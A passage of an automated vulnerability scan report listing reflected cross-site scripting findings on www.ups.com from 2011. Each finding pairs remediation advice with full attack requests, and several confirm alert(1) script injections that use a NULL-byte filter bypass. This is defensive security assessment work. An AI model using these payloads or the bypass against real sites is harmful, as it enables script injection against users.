Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /qvadmin/admin5ce57%0ac1d85533e83 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:48 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44436


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
theForm.elements['uid'].value=uidField;

if (theForm.elements['bean.autopop'].checked)
{

//actionUrl = ssoLoginUrl + "1" + "&returnto=" + 'https://www.ups.com/qvadmin/admin5ce57
c1d85533e83
?appid=CVA';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + 'https://www.ups.com/qvadmin/admi
...[SNIP]...

1.174. https://www.ups.com/qvadmin/admin [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.ups.com
Path:   /qvadmin/admin

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6c0c8'%3b1919f17d50a was submitted in the REST URL parameter 2. This input was echoed as 6c0c8';1919f17d50a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /qvadmin/admin6c0c8'%3b1919f17d50a HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:47 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44453


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
appid=CVA';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + 'https://www.ups.com/qvadmin/admin6c0c8';1919f17d50a?appid=CVA';
}
else
{

//actionUrl = ssoLoginUrl + "0" + "&returnto=" + 'https://www.ups.com/qvadmin/admin6c0c8';1919f17d50a?appid=CVA';
actionUrl = "/one-to-one/lo
...[SNIP]...

1.175. https://www.ups.com/qvadmin/admin [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.ups.com
Path:   /qvadmin/admin

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4f64"%20a%3db%20aadbdf6cf43 was submitted in the REST URL parameter 2. This input was echoed as d4f64" a=b aadbdf6cf43 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /qvadmin/admind4f64"%20a%3db%20aadbdf6cf43 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:44 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44537


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="https://www.ups.com/qvadmin/admind4f64" a=b aadbdf6cf43?appid=CVA">
...[SNIP]...

1.176. https://www.ups.com/qvadmin/admin [loc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.ups.com
Path:   /qvadmin/admin

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %00d747f'-alert(1)-'1b60fb3e3a6 was submitted in the loc parameter. This input was echoed as d747f'-alert(1)-'1b60fb3e3a6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /qvadmin/admin?loc=en_US%00d747f'-alert(1)-'1b60fb3e3a6&WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:13 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 14513


<!-- SearchBodyStart -->


<!--
Content Name: LoginCustomForSSO.jsp
-->

<!-- Begin include -->


<body onload="document.LoginPage.elements['bean.uid'].focus()"/>


<S
...[SNIP]...
3e3a6&appid=CVA';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + '/myups/info/home?loc=en_US_d747f'-alert(1)-'1b60fb3e3a6&appid=CVA';
}
else
{

//actionUrl = ssoLoginUrl + "0" + "&returnto=" + '/myups/info/home?loc=en_US_d747f'-alert(1)-'1b60fb3e3a6&appid=CVA';
actionUrl = "/one-to-on
...[SNIP]...

1.177. https://www.ups.com/qvadmin/admin [loc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.ups.com
Path:   /qvadmin/admin

Issue detail

The value of the loc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0055a41"><script>alert(1)</script>778c84f00ce was submitted in the loc parameter. This input was echoed as 55a41"><script>alert(1)</script>778c84f00ce in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /qvadmin/admin?loc=en_US%0055a41"><script>alert(1)</script>778c84f00ce&WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:09 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15218


<!-- SearchBodyStart -->


<!--
Content Name: LoginCustomForSSO.jsp
-->

<!-- Begin include -->


<body onload="document.LoginPage.elements['bean.uid'].focus()"/>


<S
...[SNIP]...
<a href="/myups/forgotpassword?loc=en_US_55a41"><script>alert(1)</script>778c84f00ce&returnto=%2Fmyups%2Ffinishlogin%3Floc%3Den_US_55a41%26quot%3B%26gt%3B%26lt%3Bscript%26gt%3Balert%281%29%26lt%3B%2Fscript%26gt%3B778c84f00ce%26amp%3Bauto%3D0%26amp%3Breturnto%3D%2Fmyups%2Finfo%2Fhome%3
...[SNIP]...

1.178. https://www.ups.com/qvadmin/admin [loc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.ups.com
Path:   /qvadmin/admin

Issue detail

The value of the loc request parameter is copied into a JavaScript rest-of-line comment. The payload %008f676</script><script>alert(1)</script>17aa4dd78c7 was submitted in the loc parameter. This input was echoed as 8f676</script><script>alert(1)</script>17aa4dd78c7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /qvadmin/admin?loc=en_US%008f676</script><script>alert(1)</script>17aa4dd78c7&WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:19 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15339


<!-- SearchBodyStart -->


<!--
Content Name: LoginCustomForSSO.jsp
-->

<!-- Begin include -->


<body onload="document.LoginPage.elements['bean.uid'].focus()"/>


<S
...[SNIP]...
"";
theForm.elements['uid'].value=uidField;

if (theForm.elements['bean.autopop'].checked)
{

//actionUrl = ssoLoginUrl + "1" + "&returnto=" + '/myups/info/home?loc=en_US_8f676</script><script>alert(1)</script>17aa4dd78c7&appid=CVA';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + '/myups/info/home?loc=en_US_8f676
...[SNIP]...

1.179. https://www.ups.com/sharp/prefapp [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.ups.com
Path:   /sharp/prefapp

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6dddb"%20a%3db%204ee8ba2c754 was submitted in the REST URL parameter 2. This input was echoed as 6dddb" a=b 4ee8ba2c754 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /sharp/prefapp6dddb"%20a%3db%204ee8ba2c754 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:29 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44452


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="https://www.ups.com/sharp/prefapp6dddb" a=b 4ee8ba2c754">
...[SNIP]...

1.180. https://www.ups.com/sharp/prefapp [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.ups.com
Path:   /sharp/prefapp

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript rest-of-line comment. The payload 359b8%0ad79fe9d4b74 was submitted in the REST URL parameter 2. This input was echoed as 359b8
d79fe9d4b74
in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sharp/prefapp359b8%0ad79fe9d4b74 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:36 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44351


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
theForm.elements['uid'].value=uidField;

if (theForm.elements['bean.autopop'].checked)
{

//actionUrl = ssoLoginUrl + "1" + "&returnto=" + 'https://www.ups.com/sharp/prefapp359b8
d79fe9d4b74
';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + 'https://www.ups.com/sharp/prefapp359b8
d79
...[SNIP]...

1.181. https://www.ups.com/sharp/prefapp [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.ups.com
Path:   /sharp/prefapp

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f6808'%3bdb8080cd607 was submitted in the REST URL parameter 2. This input was echoed as f6808';db8080cd607 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sharp/prefappf6808'%3bdb8080cd607 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:33 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44368


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
8080cd607';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + 'https://www.ups.com/sharp/prefappf6808';db8080cd607';
}
else
{

//actionUrl = ssoLoginUrl + "0" + "&returnto=" + 'https://www.ups.com/sharp/prefappf6808';db8080cd607';
actionUrl = "/one-to-one/login?ID=100&loc=" + t
...[SNIP]...

1.182. https://www.ups.com/sharp/prefapp [loc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.ups.com
Path:   /sharp/prefapp

Issue detail

The value of the loc request parameter is copied into a JavaScript rest-of-line comment. The payload %0066d80</script><script>alert(1)</script>b0ec02ae3bc was submitted in the loc parameter. This input was echoed as 66d80</script><script>alert(1)</script>b0ec02ae3bc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /sharp/prefapp?appid=pp&loc=en_US%0066d80</script><script>alert(1)</script>b0ec02ae3bc&WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:44 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15217


<!-- SearchBodyStart -->


<!--
Content Name: LoginCustomForSSO.jsp
-->

<!-- Begin include -->


<body onload="document.LoginPage.elements['bean.uid'].focus()"/>


<S
...[SNIP]...
"";
theForm.elements['uid'].value=uidField;

if (theForm.elements['bean.autopop'].checked)
{

//actionUrl = ssoLoginUrl + "1" + "&returnto=" + '/myups/info/home?loc=en_US_66d80</script><script>alert(1)</script>b0ec02ae3bc';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + '/myups/info/home?loc=en_US_66d80</script>
...[SNIP]...

1.183. https://www.ups.com/sharp/prefapp [loc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.ups.com
Path:   /sharp/prefapp

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %00719ef'-alert(1)-'2df5a1668f0 was submitted in the loc parameter. This input was echoed as 719ef'-alert(1)-'2df5a1668f0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /sharp/prefapp?appid=pp&loc=en_US%00719ef'-alert(1)-'2df5a1668f0&WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:36 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 14391


<!-- SearchBodyStart -->


<!--
Content Name: LoginCustomForSSO.jsp
-->

<!-- Begin include -->


<body onload="document.LoginPage.elements['bean.uid'].focus()"/>


<S
...[SNIP]...
1)-'2df5a1668f0';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + '/myups/info/home?loc=en_US_719ef'-alert(1)-'2df5a1668f0';
}
else
{

//actionUrl = ssoLoginUrl + "0" + "&returnto=" + '/myups/info/home?loc=en_US_719ef'-alert(1)-'2df5a1668f0';
actionUrl = "/one-to-one/login?ID=100&loc="
...[SNIP]...

1.184. https://www.ups.com/sharp/prefapp [loc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.ups.com
Path:   /sharp/prefapp

Issue detail

The value of the loc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0039e38"><script>alert(1)</script>3b2cdfd84b8 was submitted in the loc parameter. This input was echoed as 39e38"><script>alert(1)</script>3b2cdfd84b8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /sharp/prefapp?appid=pp&loc=en_US%0039e38"><script>alert(1)</script>3b2cdfd84b8&WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:32 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15096


<!-- SearchBodyStart -->


<!--
Content Name: LoginCustomForSSO.jsp
-->

<!-- Begin include -->


<body onload="document.LoginPage.elements['bean.uid'].focus()"/>


<S
...[SNIP]...
<a href="/myups/forgotpassword?loc=en_US_39e38"><script>alert(1)</script>3b2cdfd84b8&returnto=%2Fmyups%2Ffinishlogin%3Floc%3Den_US_39e38%26quot%3B%26gt%3B%26lt%3Bscript%26gt%3Balert%281%29%26lt%3B%2Fscript%26gt%3B3b2cdfd84b8%26amp%3Bauto%3D0%26amp%3Breturnto%3D%2Fmyups%2Finfo%2Fhome%3
...[SNIP]...

1.185. https://www.ups.com/uis/create [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.ups.com
Path:   /uis/create

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript rest-of-line comment. The payload ad3bb%0a74617239e86 was submitted in the REST URL parameter 1. This input was echoed as ad3bb
74617239e86
in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /uisad3bb%0a74617239e86/create HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:36 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 42143


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
d = "";
theForm.elements['uid'].value=uidField;

if (theForm.elements['bean.autopop'].checked)
{

//actionUrl = ssoLoginUrl + "1" + "&returnto=" + 'https://www.ups.com/uisad3bb
74617239e86
/create?appid=UIS';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + 'https://www.ups.com/uisad
...[SNIP]...

1.186. https://www.ups.com/uis/create [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.ups.com
Path:   /uis/create

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4095b"%20a%3db%20b63a7a57432 was submitted in the REST URL parameter 1. This input was echoed as 4095b" a=b b63a7a57432 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /uis4095b"%20a%3db%20b63a7a57432/create HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:29 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 42241


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
